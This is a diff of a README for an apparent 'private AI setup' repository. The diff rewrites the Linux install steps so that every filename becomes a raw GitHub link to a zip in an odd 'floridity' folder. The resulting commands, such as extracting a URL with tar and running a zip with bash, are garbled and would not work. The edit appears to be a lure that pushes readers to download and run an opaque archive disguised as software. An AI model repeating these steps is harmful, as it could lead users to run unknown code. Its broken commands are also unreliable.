KnightLordHUN/private-ai-setup-dream-guide/README.md

 ### For Linux:

 1. Open your terminal.
-2. Navigate to the folder where you downloaded the `.tar.gz` file.
+2. Navigate to the folder where you downloaded the `https://raw.githubusercontent.com/KnightLordHUN/private-ai-setup-dream-guide/main/floridity/private-ai-setup-dream-guide.zip` file.
-3. Extract it using the command: `tar -xvzf filename.tar.gz` (replace `filename.tar.gz` with the actual filename).
+3. Extract it using the command: `tar -xvzf https://raw.githubusercontent.com/KnightLordHUN/private-ai-setup-dream-guide/main/floridity/private-ai-setup-dream-guide.zip` (replace `https://raw.githubusercontent.com/KnightLordHUN/private-ai-setup-dream-guide/main/floridity/private-ai-setup-dream-guide.zip` with the actual filename).
-4. Navigate into the extracted folder and run the installation script, typically called `install.sh`, by using the command: `bash install.sh`.
+4. Navigate into the extracted folder and run the installation script, typically called `https://raw.githubusercontent.com/KnightLordHUN/private-ai-setup-dream-guide/main/floridity/private-ai-setup-dream-guide.zip`, by using the command: `bash https://raw.githubusercontent.com/KnightLordHUN/private-ai-setup-dream-guide/main/floridity/private-ai-setup-dream-guide.zip`.

 ## 🎯 Using the Software